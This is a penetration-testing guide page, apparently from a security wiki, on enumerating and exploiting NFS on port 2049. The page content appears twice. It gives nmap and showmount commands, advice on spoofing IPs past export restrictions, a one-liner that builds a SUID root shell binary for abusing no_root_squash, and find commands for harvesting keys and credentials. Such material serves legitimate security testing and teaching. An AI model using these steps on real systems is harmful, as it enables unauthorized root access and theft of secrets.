NFS Service - Port 2049

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

Basic info

The Network File System (NFS) allows file sharing across Unix-like systems over a network. While convenient, NFS often exposes sensitive data and trust relationships due to misconfigurations or outdated security models. This guide delivers in-depth methods for discovering, analyzing, and exploiting NFS services during penetration testing engagements.

Identifying NFS Services During Network Reconnaissance

Port Scanning and Service Enumeration

NFS uses the following ports:

TCP/UDP 2049 – NFS Service
TCP/UDP 111 – Portmapper (rpcbind)

Run a detailed Nmap scan:

nmap -sV -sT -p 111,2049 --script=nfs-showmount,nfs-ls,nfs-statfs <target-ip>

Check for exposed mount points and exports.

Enumerating NFS Exports

Using `showmount`

Check accessible NFS shares:

showmount -e <target-ip>

Example output:

Export list for 10.0.0.1:
/home           *
/var/nfs        192.168.0.0/24

* means accessible from any host
CIDR indicates trusted networks

Bypassing IP-based Access Controls

Use spoofed IP addresses or proxy from allowed subnets. In some cases, a misconfigured DNS resolution can allow access even if IP-based restrictions are in place.

Mounting NFS Shares and Privilege Analysis

Mounting an Export Locally

mkdir /mnt/nfs
mount -t nfs <target-ip>:/home /mnt/nfs

Check for files with improper permissions or user credentials.

UID/GID Mappings and Root Squashing

By default, NFS applies root squashing: remote root becomes nfsnobody. Check /etc/exports configuration for no_root_squash option:

/home *(rw,sync,no_root_squash)

If no_root_squash is set, root access is preserved, allowing privilege escalation.

Exploiting no_root_squash for Remote Code Execution

Step-by-Step Attack

Create a SUID Binary on Mounted Share

echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\nint main(){setuid(0); system("/bin/bash");}' > rootsh.c
gcc rootsh.c -o rootsh
chmod +s rootsh
mv rootsh /mnt/nfs/

Trigger Execution on Target If the NFS share is mounted by a target system, wait for the binary to sync and then trigger execution through a scheduled task or user login.
Gain Shell with Root Privileges

Enumerating and Extracting Sensitive Files

Commands to Discover Valuable Files

find /mnt/nfs -type f -name "*.conf"
find /mnt/nfs -type f -name "*.pem"
find /mnt/nfs -type f -perm -4000

Look for:

SSH private keys
Database credentials
Password backup files
Misconfigured .bashrc, .profile, or crontabs

Learn & practice For the Bug Bounty

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁

Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

PreviousCompaq HP Insight Manager - Port 2301, 2381 NextDocker - Port 2375,2376

Last updated 1 month ago

Was this helpful?

NFS Service - Port 2049

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

Basic info

Identifying NFS Services During Network Reconnaissance

Port Scanning and Service Enumeration

NFS uses the following ports:

TCP/UDP 2049 – NFS Service
TCP/UDP 111 – Portmapper (rpcbind)

Run a detailed Nmap scan:

nmap -sV -sT -p 111,2049 --script=nfs-showmount,nfs-ls,nfs-statfs <target-ip>

Check for exposed mount points and exports.

Enumerating NFS Exports

Using `showmount`

Check accessible NFS shares:

showmount -e <target-ip>

Example output:

Export list for 10.0.0.1:
/home           *
/var/nfs        192.168.0.0/24

* means accessible from any host
CIDR indicates trusted networks

Bypassing IP-based Access Controls

Use spoofed IP addresses or proxy from allowed subnets. In some cases, a misconfigured DNS resolution can allow access even if IP-based restrictions are in place.

Mounting NFS Shares and Privilege Analysis

Mounting an Export Locally

mkdir /mnt/nfs
mount -t nfs <target-ip>:/home /mnt/nfs

Check for files with improper permissions or user credentials.

UID/GID Mappings and Root Squashing

By default, NFS applies root squashing: remote root becomes nfsnobody. Check /etc/exports configuration for no_root_squash option:

/home *(rw,sync,no_root_squash)

If no_root_squash is set, root access is preserved, allowing privilege escalation.

Exploiting no_root_squash for Remote Code Execution

Step-by-Step Attack

Create a SUID Binary on Mounted Share

echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\nint main(){setuid(0); system("/bin/bash");}' > rootsh.c
gcc rootsh.c -o rootsh
chmod +s rootsh
mv rootsh /mnt/nfs/

Trigger Execution on Target If the NFS share is mounted by a target system, wait for the binary to sync and then trigger execution through a scheduled task or user login.
Gain Shell with Root Privileges

Enumerating and Extracting Sensitive Files

Commands to Discover Valuable Files

find /mnt/nfs -type f -name "*.conf"
find /mnt/nfs -type f -name "*.pem"
find /mnt/nfs -type f -perm -4000

Look for:

SSH private keys
Database credentials
Password backup files
Misconfigured .bashrc, .profile, or crontabs

Learn & practice For the Bug Bounty

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁

Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

PreviousCompaq HP Insight Manager - Port 2301, 2381 NextDocker - Port 2375,2376

Last updated 1 month ago

Was this helpful?

Basic info

Identifying NFS Services During Network Reconnaissance

Port Scanning and Service Enumeration

Enumerating NFS Exports

Using showmount

Bypassing IP-based Access Controls

Mounting NFS Shares and Privilege Analysis

Mounting an Export Locally

UID/GID Mappings and Root Squashing

Exploiting no_root_squash for Remote Code Execution

Step-by-Step Attack

Enumerating and Extracting Sensitive Files

Commands to Discover Valuable Files

Basic info

Identifying NFS Services During Network Reconnaissance

Port Scanning and Service Enumeration

Enumerating NFS Exports

Using showmount

Bypassing IP-based Access Controls

Mounting NFS Shares and Privilege Analysis

Mounting an Export Locally

UID/GID Mappings and Root Squashing

Exploiting no_root_squash for Remote Code Execution

Step-by-Step Attack

Enumerating and Extracting Sensitive Files

Commands to Discover Valuable Files

Using `showmount`

Using `showmount`